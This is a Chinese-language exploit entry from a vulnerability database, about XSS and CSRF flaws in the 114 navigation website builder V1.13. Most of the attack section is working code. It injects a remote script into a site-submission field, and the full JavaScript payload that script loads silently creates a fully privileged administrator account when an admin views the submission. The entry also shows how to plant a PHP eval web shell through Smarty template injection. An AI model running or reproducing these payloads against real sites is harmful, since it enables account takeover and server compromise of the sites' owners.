Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

114啦网址导航建站系统 V1.13存在XSS、CSRF漏洞

🗓️ 30 Jun 2010 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 31 Views

114 Navigation Website Builder V1.13 XSS CSRF Vulnerabilitie

Code

                                                在网站名称那一栏填写<script src=http://www.ssvdb.com/exp.js></script>(src是填自己的js文件的地址,别跟我说那文件不存在)
其它的符合要求就OK..然后提交..等待管理员查看网站收录审核的时候就会执行那个js文件.
这里我放一个添加管理员账户的js,其实可以直接拿shell的

exp.js

//添加一个管理员账户
var siteurl = document.URL;
siteurl = siteurl.replace(/(.*\/){0,}([^\.]+).*/ig,"$1");
var username="sogili";//用户名
var password="sb250";//密码
var request = false;
 
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
if(request.overrideMimeType) {
request.overrideMimeType('text/xml');
}
} else if(window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
for(var i=0; i<versions.length; i++) {
try {
request = new ActiveXObject(versions[i]);
} catch(e)
{}
}
}
 
var xmlhttp=request;
 
xmlhttp.open("GET",siteurl+"/index.php?c=member", false);
xmlhttp.setRequestHeader("Referer", siteurl);
xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
xmlhttp.send();
if (xmlhttp.responseText.indexOf(username)<0) {
xmlhttp.open("POST", siteurl + "/index.php?c=member&a=member_add", false);
xmlhttp.setRequestHeader("Referer", siteurl);
xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xmlhttp.send("name=" + username + "&password=" + password + "&step=2");
 
xmlhttp.open("POST", siteurl + "/index.php?c=member&a=member_edit", false);
xmlhttp.setRequestHeader("Referer", siteurl);
xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xmlhttp.send("auth%5Bmember114laurl_add114lafeedback%5D=1&auth%5Bconfig114la%5D=1&auth%5Bfamous_nav114lafamous_loop_playfamous_nav_tab114laindex_site114laindex_tool114lamztopl114larecycler%5D=1&auth%5Bzhuanti114lazhuanti_class%5D=1&auth%5Badvise_index114lakey%5D=1&auth%5Bbackup114larestore114larepair114laclear114lamysites%5D=1&auth%5Btemplate_manage%5D=1&auth%5Bmake_html114la%5D=1&auth%5Bheader114lamenu114lawelcome114laframe114lalogin%5D=1&auth%5Bsecurity114la%5D=1&auth%5Bsite_manage%5D=1&auth%5Bplan%5D=1&auth%5Bclass%5D=1&auth%5Blog%5D=1&step=2&name=" + username);
}

数据管理->申请收录版块->插入<{php}>@eval($_POST['a']);< {/php}>  -> shell:url-submit/index.php
说明下:由于网站使用的smarty模板引擎,而smarty支持插入php代码,导致漏洞发生,可以看出作者对第三方库了解不全面..

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
30 Jun 2010 00:00Current
7.1High risk
Vulners AI Score7.1
114 navigation website buildercross-site scriptingcross-site request forgeryexploit
31